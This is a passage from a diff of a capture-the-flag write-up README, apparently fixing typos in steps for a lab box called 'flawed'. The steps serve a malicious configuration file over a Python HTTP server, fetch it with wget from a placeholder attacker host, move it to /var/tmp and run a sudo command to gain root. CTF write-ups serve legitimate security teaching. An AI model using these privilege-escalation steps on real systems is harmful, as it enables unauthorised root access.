theMcSam/brCTF-writeups/flawed/README.md

 `python3 -m http.server 8000` <br>
 ![python http server](https://raw.githubusercontent.com/theMcSam/brCTF-writeups/main/flawed/images/start-python-http-server.png "a title")

-Downloading the malicious configuation from our python http server.<br>
+Downloading the malicious configuration from our python http server.<br>
-NB: make sure you have write privileges to the current diretory you are in.
+NB: make sure you have write privileges to the current directory you are in.
 You can use the `/tmp` since it has very loose permissions.<br>
 `wget http://<server.ip>:<port>/test.conf`
 ![python http server](https://raw.githubusercontent.com/theMcSam/brCTF-writeups/main/flawed/images/downloading-mal-conf-file.png "a title")

-Right after downloading the file we transfer it the the `/var/tmp` direcrory.
+Right after downloading the file we transfer it the the `/var/tmp` directory.
 This is necessary because it is the only folder that we can execute configuration files from.<br>
 ![copy to var-tmp](https://raw.githubusercontent.com/theMcSam/brCTF-writeups/main/flawed/images/copy-payload-to-tmp.png "a title")

 Now we can run our command with sudo to gain root privileges.<br>